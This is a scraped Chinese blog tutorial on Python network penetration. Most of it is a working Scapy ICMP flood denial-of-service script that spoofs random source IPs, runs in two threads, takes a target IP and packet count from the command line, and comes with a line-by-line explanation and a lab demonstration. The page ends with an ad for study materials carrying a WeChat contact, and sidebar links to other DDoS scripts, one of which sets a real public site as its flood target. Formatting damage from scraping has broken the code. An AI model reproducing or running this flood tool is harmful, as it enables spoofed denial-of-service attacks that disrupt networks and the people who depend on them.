python网络渗透之:DOS攻击篇_ddos攻击脚本,2024年最新网络安全知识体系

最新推荐文章于 2024-08-27 17:50:48 发布
最新推荐文章于 2024-08-27 17:50:48 发布
阅读量1.8k 收藏 19
点赞数 19
分类专栏: 2024年程序员学习 文章标签: python 网络 ddos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84182636/article/details/137581493
版权

def main():
import sys
ICMP_FLOOD(create_ip(),str(sys.argv[1]))

if name == ‘main’:
main()

  • 可以看到我们在代码中,使用create_ip()来随机生成源ip地址来伪造ip,
  • 然后在ICMP_FLOOD()来发起攻击,在这个函数里我们构造了IP/ICMP的数据包,使用for循环来发送指定的包次。
  • 最后在main()函数中调用来实现攻击。

我们本次以Ubuntu这台机器为攻击目标,IP地址是:192.168.64.140,我们通过iftop来监测网络流量数据

我们来看看效果:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

可以看到,随着我们发的包越来越多,iftop的检测数据的条也就越来越长,相应的数据大小也有明显的变化。

以下是改进之后的ICMP Flood DOS python代码:

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

data_package_number = 0

class IFD():
def init(self):
pass
def icmp_dos_log(self):
log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |) | | | | | | | _ \ -d >> -d[objective ip]
| | || | | | __/ | || | || |) | --appoint send package number(recommend even):
|_|| ||| |/ ___/|_/ -o >> -o[number]

version: v_1.1 developer: hare

“”"
return log

def create_ip(self):
from ipaddress import ip_network
self.ip_pool = []
r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
for ip in r_ip:
self.ip_pool.append(ip)
return str(choice(self.ip_pool))

def send_data_package(self,ip_dst,sp_num):
global data_package_number
sp_num = int(int(sp_num)/2)

ip_src = self.create_ip()

for i in range(sp_num):
ip_src = self.create_ip()
data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
send(data_package,verbose=False)
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !“)
data_package_number+=1
if sp_num%2 != 0:
ip_src = self.create_ip()
data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
send(data_package, verbose=False)
print(f”[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number += 1

def main():
import sys
icmp_flood_dos = IFD()
print(icmp_flood_dos.icmp_dos_log())
try:
if sys.argv[1] == “-d” and sys.argv[3] == “-o”:
time_1 = time.time()
thread_pool = []
for thread in range(2):
dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
dos_thread.start()
thread_pool.append(dos_thread)
for tp in thread_pool:
tp.join()
time_2 = time.time()
times = time_2-time_1
print(f"\r\n[*]The runtime of this attack is:({times}) second !“)
print(”[+]data package number is: “,data_package_number)
else:
print(”[Error Type] options type is error !“)
time.sleep(1)
except:
if len(sys.argv) == 1:
pass
else:
print(”[Error Options] options is error !")
time.sleep(1)
if name == ‘main’:
main()
time.sleep(2)

下面给出代码的解析:

一、 导入需要的库

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

二、定义一个类IFD,包含icmp_dos_log()、create_ip()和send_data_package()三个方法

class IFD():
def init(self):
pass
def icmp_dos_log(self):

返回攻击脚本的log界面及使用说明

log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |) | | | | | | | _ \ -d >> -d[objective ip]
| | || | | | __/ | || | || |) | --appoint send package number(recommend even):
|_|| ||| |/ ___/|_/ -o >> -o[number]

version: v_1.1 developer: hare

“”"
return log

随机生成源IP地址

def create_ip(self):
from ipaddress import ip_network
self.ip_pool = []
r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
for ip in r_ip:

将生成的IP网络地址池加入到ip_pool列表中

self.ip_pool.append(ip)

返回随机选择的IP地址

return str(choice(self.ip_pool))

def send_data_package(self,ip_dst,sp_num):
global data_package_number

将要发送的数据包数量除以2,因为会有两个线程分别发送,为了避免重复,每个线程发送数据包数量为总数的一半。

sp_num = int(int(sp_num)/2)
for i in range(sp_num):
#调用create_ip生成源ip地址,使每次发包产生不同的源ip地址
ip_src = self.create_ip()

构造ICMP数据包

data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))

发送数据包

send(data_package,verbose=False)

打印发送成功信息

print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number+=1

若数据包数量为奇数,则再发送一份数据包(即多发送一次)

if sp_num%2 != 0:
ip_src = self.create_ip()
data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
send(data_package, verbose=False)
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-bMseYNnn-1712712039753)]

2401_84182636
关注
专栏目录
[网络安全提高] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-24 412
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
网络安全就业前景好不好?0基础可以学吗?_入门级网络安全工程师好就业吗
2401_84301948的博客
04-27 346
对于从来没有接触过网络安全的同学,我们帮你准备了详细的。可以说是,大家跟着这个大的方向学习准没问题。
python Ddos 攻击脚本
2301_76774256的博客
07-19 1796
以上一切一切内容请勿用于非法用图,攻击网站,否则后果自负。
10种常见的黑客攻击、满足你的黑客梦,零基础入门到精通,收藏这一就够了
最新发布
程序员阿飘 的博客
08-27 656
零日攻击是模糊攻击的扩展,但不要求识别漏洞本身。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
python网络渗透之:DOS攻击
hih30250的博客
12-18 3469
Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 3426
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
Python 之 源代码 DDOS攻击
君逍遥o
10-26 3256
Python;源代码;DDOS攻击
python ddos攻击脚本_利用python脚本自动拦截DDOS攻击
weixin_39638929的博客
11-29 421
改成python试试一个很实用的iptables脚本,实现自动拒绝可疑IP地址,并发送报警邮件,短信linux:~ # cat iptables#!/bin/bashtouch /root/back_bad_ip.txttime=`date +"%Y-%m-%d %H:%M:%S"`ar=`wc -l /root/back_bad_ip.txt |awk '{print $1}'`sleep 1...
python网络渗透之:DOS攻击_ddos攻击脚本(1),2024最新面试指导书籍
2401_84139624的博客
04-18 1042
(img-6rnyxFfB-1713377645952)]# 返回攻击脚本的log界面及使用说明。
python网络渗透之:DOS攻击_ddos攻击脚本,百度面试编程题
m0_61408947的博客
04-15 543
返回攻击脚本的log界面及使用说明。
2024山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)_2024山东省职业院校技能大赛中职组网络安全赛项竞赛样题(2)
2401_84252820的博客
05-05 902
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。密码:root),进入mysql数据库,改变默认 mysql 管理员的名称,将系统的默认管理员root 改为 admin,防止被列举,将操作命令作为flag提交。密码:root),进入mysql数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的用户,使用drop命令将该用户删除,将操作命令作为flag提交。
python实现的防DDoS脚本
01-21
博可以说连开场白都可以省掉了,之所以被DDoS,并不是因为惹了疯狗被追着咬,而是因为VC悲剧之后流量全到simplecd来了。 不仅如此,一些笨蛋们在抓站,一些笨蛋们在用迅雷下载,100Mbps的端口居然已经满负荷运作十几个小时了,这是什么概念?100Mbps满负荷1天,流量就是1000G,这样下去不用多久,我就可以等着上百刀的罚单了,泪飙。 此外,100Mbps的速度使得硬盘都快转不动了,严重拖累网站的响应速度,卡得我欲仙欲死啊真是。想当VC挂了一天,被抓站的家伙们搞得一个礼拜半残废状态(其中那些家伙包括我在内,汗)。simplecd就更支撑不了了。 事实上这种人肉DDoS比正常的DD
2024最全计算机网络安全(3),网络安全面试自我介绍
2401_84247423的博客
05-06 704
网络中的硬件、软件和系统数据不被破坏、更改、泄露,系统能连续可靠的正常允许,网络服务不中断。数据完整服务,数据保密性服务,访问控制服务,鉴别服务,抗抵赖性服务二.密码学=====看我另外一博客计算机网络安全——密码学_转行卖煎饼的博客-CSDN博客三.消息认证和数字签名验证真实身份和所声称身份的过程,认证方式有口令、动态密码、IC卡三种AAA技术包括:授权,认证,计费五.公钥基础设施(PKI)数字证书是由CA签发的、标志身份信息的一系列数据,采用公钥密码体制。
网络安全协议分析技术教程_2024-07-10_13-26-46
kkchenjj的博客
07-10 881
TCP/IP协议族是Internet的基础,由多个协议组成,用于在不同网络之间传输数据。其中,TCP(传输控制协议)和IP(互联网协议)是核心协议。
python ddos
Halfopen的专栏
06-09 1503
#!/usr/bin/env python import socket import time import threading #Pressure Test,ddos tool #--------------------------- MAX_CONN=20000 PORT=80 HOST="www.baidu.com" PAGE="/index.php" #------------------
python ddos攻击脚本_python版本DDOS攻击脚本
weixin_39850062的博客
11-29 649
今天为了休息下,换换脑子,于是就找到了我之前收藏的一python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了。附上源码pyDdos.py:#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#---------------------------MAX_CONN...
DDOS攻击脚本
热门推荐
小杜的博客
04-10 1万+
netstat 查看网络连接数。如果一个IP地址对服务器建立很多连接数(比如一分钟产生了100个连接),就认为发生了DDO 使用详解 1安装httpd 2开启httpd 3向httpd默认得目录下放一个页面 4写ddos脚本 5模拟ddos进行攻击(网址可以改成自己本地IP或者是本地的回环地址127.0.0.1) 6脚本运行 ab命令:做压力测试的工具和性能的监控工具 语法: ab -n ...
python实现dos攻击_Python实现DDOS攻击脚本
weixin_39948439的博客
11-20 1070
构建多个socket链接后,每个socket对这个网站无限的发送信息,做一个死循环,疯狂攻击。以起到占用他们网站资源链接的效果import socketimport timeimport threadingMAX_CONN = 200000 # 最大socket链接量PORT = 80HOST = "地址"PAGE = "/photography"buf = ("POST %s HTTP/1...
python模拟ddos攻击_pythonDDOS攻击脚本
weixin_39887577的博客
11-22 1336
本文实例为大家分享了pythonDDOS攻击脚本,供大家参考,具体内容如下于是就找到了我之前收藏的一python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了。附上源码pyDdos.py:#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#----------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值